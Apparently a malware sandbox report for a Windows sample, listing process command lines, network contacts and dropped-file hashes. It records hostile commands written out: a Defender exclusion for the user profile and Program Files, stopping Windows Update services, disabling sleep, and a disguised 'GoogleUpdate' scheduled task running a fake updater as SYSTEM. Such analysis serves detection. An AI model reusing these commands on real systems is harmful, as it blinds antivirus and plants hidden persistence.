"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=64968 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1972 --field-trial-handle=1444,i,14209796380341034754,2756150845659543301,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 276

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 876

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=64968 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2228 --field-trial-handle=1444,i,14209796380341034754,2756150845659543301,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=64968 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2588 --field-trial-handle=1444,i,14209796380341034754,2756150845659543301,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=64968 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3228 --field-trial-handle=1444,i,14209796380341034754,2756150845659543301,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=64968 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3408 --field-trial-handle=1444,i,14209796380341034754,2756150845659543301,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=64968 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3548 --field-trial-handle=1444,i,14209796380341034754,2756150845659543301,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2548 --field-trial-handle=1444,i,14209796380341034754,2756150845659543301,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x390 0x470

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 209.250.248.11:33522 tcp
US 8.8.8.8:53 11.248.250.209.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.159.129.168:80 tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.54:443 i.ytimg.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
RU 185.149.146.118:80 tcp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 238.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 54.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 194.23.217.172.in-addr.arpa udp
RU 77.91.77.144:80 tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.162:443 googleads.g.doubleclick.net tcp
NL 142.250.179.162:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 lh4.googleusercontent.com udp
NL 142.251.36.1:443 lh4.googleusercontent.com tcp
US 8.8.8.8:53 162.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.54:443 i.ytimg.com udp

Files

memory/4680-133-0x0000000003610000-0x0000000003639000-memory.dmp

memory/4680-134-0x0000000003640000-0x000000000367F000-memory.dmp

memory/4680-135-0x0000000000400000-0x00000000018C7000-memory.dmp

memory/4680-136-0x0000000074920000-0x00000000750D0000-memory.dmp

memory/4680-137-0x0000000006070000-0x0000000006080000-memory.dmp

memory/4680-138-0x0000000006070000-0x0000000006080000-memory.dmp

memory/4680-139-0x0000000006080000-0x0000000006624000-memory.dmp

memory/4680-140-0x000000000BB60000-0x000000000C178000-memory.dmp

memory/4680-141-0x000000000C200000-0x000000000C30A000-memory.dmp

memory/4680-142-0x0000000003610000-0x0000000003639000-memory.dmp

memory/4680-144-0x0000000006070000-0x0000000006080000-memory.dmp

memory/4680-143-0x000000000C340000-0x000000000C352000-memory.dmp

memory/4680-145-0x000000000C360000-0x000000000C39C000-memory.dmp

memory/4680-146-0x0000000000400000-0x00000000018C7000-memory.dmp

memory/4680-147-0x0000000003640000-0x000000000367F000-memory.dmp

memory/4680-148-0x0000000074920000-0x00000000750D0000-memory.dmp

memory/4680-149-0x000000000C560000-0x000000000C5D6000-memory.dmp

memory/4680-150-0x000000000C5E0000-0x000000000C672000-memory.dmp

memory/4680-151-0x000000000C780000-0x000000000C7E6000-memory.dmp

memory/4680-152-0x000000000D000000-0x000000000D1C2000-memory.dmp

memory/4680-153-0x000000000D1D0000-0x000000000D6FC000-memory.dmp

memory/4680-154-0x0000000006070000-0x0000000006080000-memory.dmp

memory/4680-155-0x000000000D950000-0x000000000D9A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/3204-173-0x00000000007F0000-0x0000000000A7B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/636-191-0x0000000000B20000-0x0000000001154000-memory.dmp

memory/636-192-0x0000000077574000-0x0000000077576000-memory.dmp

memory/636-193-0x0000000000B20000-0x0000000001154000-memory.dmp

memory/636-194-0x00000000034A0000-0x0000000003510000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/3632-197-0x0000000000400000-0x0000000000527000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/4776-204-0x00007FF611210000-0x00007FF612436000-memory.dmp

memory/4776-200-0x00007FF611210000-0x00007FF612436000-memory.dmp

memory/3204-208-0x00000000007F0000-0x0000000000A7B000-memory.dmp

memory/4776-210-0x00007FFA4BF30000-0x00007FFA4C125000-memory.dmp

memory/3632-209-0x0000000000400000-0x0000000000527000-memory.dmp

memory/636-206-0x0000000006150000-0x0000000006172000-memory.dmp

memory/3632-211-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-212-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-214-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-233-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-243-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-252-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-255-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-256-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-258-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/4680-253-0x0000000000400000-0x00000000018C7000-memory.dmp

memory/3632-260-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/4776-257-0x00007FF611210000-0x00007FF612436000-memory.dmp

memory/3632-262-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-264-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-267-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/4776-265-0x00007FF611210000-0x00007FF612436000-memory.dmp

memory/3632-268-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-271-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/4776-269-0x00007FF611210000-0x00007FF612436000-memory.dmp

memory/3632-272-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\CrashpadMetrics-active.pma

MD5 d998db6bb78f1336ff0e927205cd5dcd
SHA1 4d4a205d698b61b661514654b3917375f8ab644a
SHA256 32bce0ec12f35821550b935f0f9d841c1dcb83e9316c804190d0aa26881e9d9f
SHA512 c8e05fd8ab522baeab3742ceec64eea154ebb72f9408c82babec3d01ecad67886626c13a126b9290074d4149eef1be56853e9aea72c455147fe3f7039bbfe21f

memory/3632-276-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-275-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-277-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-266-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-279-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3204-280-0x00000000007F0000-0x0000000000A7B000-memory.dmp

memory/3632-281-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-278-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/4776-261-0x00007FF611210000-0x00007FF612436000-memory.dmp

memory/3632-285-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-286-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-288-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-290-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-291-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-292-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-293-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-294-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

\??\pipe\crashpad_1328_EJDFMYCYLTNZBRWD

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4680-295-0x0000000074920000-0x00000000750D0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\Network\TransportSecurity

MD5 e7295c481f9bc61159fd77cd3250e83b
SHA1 5abf202b1a7adaaa6a40c03ee2221a2317bfecea
SHA256 5f9f1c2aecdd7ffb85b5bc80e05a9752ee4ec8371653c4bfd67f11c8ba785194
SHA512 92e7fc0cf23eebe817efc719ea353d8dff4246f9eca208763fbdf43633d7ad30de2a0b2ffb1c0f022c8e9ecef3a69bef06250bb9f824cd898a0ccfbcc8a54a26

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\Network\Reporting and NEL

MD5 732e8f6c8b989410eda306ef8bb89f07
SHA1 c4282b347fb241b9c3c8cdd3d2cd7a2181a2b416
SHA256 c80e9423c79d6fb89da9079c40c12cdac5383caf503e46265b263ebc7a9c8d26
SHA512 f0a6e66fa58ebeb2cede837ce7328dc3c955ca96d3120b6da957e9c73d8657afdf4a700d21cf256d827356f96b1edf30140ad94095a4f5e77e5c5e38f50f3de8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\Network\Network Persistent State

MD5 0133d37ce9b224020f38229ec954fa1f
SHA1 b17ba4eefb834b648b7141a8c37181f5c0f7c04a
SHA256 a94182ea7410e205b5c43042d4153de4d66281d6122736053a282ab197dcf2fd
SHA512 5567032bd5b123de5d0cb8d2eab340895dbef898927aeb67570633990ec0fe5a781c5514f7646a1f80943ec7b62c6e4106787b6109d3e1666a963ed5b499c7ff

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\Local Storage\leveldb\LOG

MD5 4b810fea8367cebba4ecb2994298718f
SHA1 859caf74a9973bbaada18472c079c14ddcf74d26
SHA256 78d748363043d80dc92edde4febde954d540497fa6faf41ec011afbee635ed96
SHA512 3f13e9c2c13088632cd5ba9c8b27dab4ca47efa8d755a8bae8b399c4d3aa014383968f26b072ac0073e945dde7d6a6741940bc211abf44e593b78af0bea4dbf7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\Local Storage\leveldb\LOG.old

MD5 555a6dc7f4c0ac48c35501643c2d5a92
SHA1 7fa3c7631654a3fa164f9fe114d1c3b0d2b40023
SHA256 334a737bf4fe06a79374a1b700cba9ea6cc1c527b50b6ea3fee91e5d8307df3f
SHA512 9e40f654e441c600c5321573b7d99e9dd27be0a1a432224bd7f93e5b011a3238692e252fada0596c12947ad0fcabab3199f10f4094c0eb250a1b2fbbda3b225a

memory/3632-284-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Local State

MD5 d1246bf7c4fdae0c60b08542d1a37f6d
SHA1 9c1c947a3f2fa9cda6af27920c9f09ccf5241ade
SHA256 de775846e4d5210879e247fd058b221208bc382e2d56974a2be5465dd1c6f3c3
SHA512 100ca3c066340e94bfe7288bb3a0fd575ca64b5b53fd3d7d6c5944aa9a94ed9dff42d77a5122c865d41e4167e1e64407ce11eab82776f84ce994b3d18a6e35ec

memory/3632-263-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-259-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/4776-251-0x00007FF611210000-0x00007FF612436000-memory.dmp

memory/3632-254-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/636-250-0x0000000006040000-0x0000000006050000-memory.dmp

memory/636-238-0x0000000006040000-0x0000000006050000-memory.dmp

memory/636-224-0x0000000006040000-0x0000000006050000-memory.dmp

memory/636-213-0x0000000074920000-0x00000000750D0000-memory.dmp

memory/3632-320-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-321-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\DawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\DawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data15A8D\Default\DawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

memory/636-343-0x0000000000B20000-0x0000000001154000-memory.dmp

memory/3632-344-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-342-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-346-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-347-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/3632-348-0x00000000FFB80000-0x00000000FFB90000-memory.dmp

memory/4776-345-0x00007FF611210000-0x00007FF612436000-memory.dmp

memory/3632-378-0x0000000077572000-0x0000000077573000-memory.dmp

memory/636-408-0x0000000000B20000-0x0000000001154000-memory.dmp

memory/2676-430-0x0000012B738C0000-0x0000012B738E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3ndi0tm.fre.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4776-435-0x00007FF611210000-0x00007FF612436000-memory.dmp

memory/2676-436-0x00007FFA2BCB0000-0x00007FFA2C771000-memory.dmp

memory/2676-442-0x0000012B738B0000-0x0000012B738C0000-memory.dmp

memory/2676-444-0x0000012B738B0000-0x0000012B738C0000-memory.dmp

memory/2676-446-0x0000012B738B0000-0x0000012B738C0000-memory.dmp

memory/4776-450-0x00007FFA4BF30000-0x00007FFA4C125000-memory.dmp

memory/636-452-0x0000000074920000-0x00000000750D0000-memory.dmp

memory/636-453-0x0000000006040000-0x0000000006050000-memory.dmp

memory/636-454-0x0000000006040000-0x0000000006050000-memory.dmp

memory/636-459-0x0000000006040000-0x0000000006050000-memory.dmp

memory/2676-451-0x00007FFA2BCB0000-0x00007FFA2C771000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/2956-506-0x00007FFA2BDD0000-0x00007FFA2C891000-memory.dmp

memory/2956-507-0x0000015F3F8B0000-0x0000015F3F8C0000-memory.dmp

memory/2956-508-0x0000015F3F8B0000-0x0000015F3F8C0000-memory.dmp

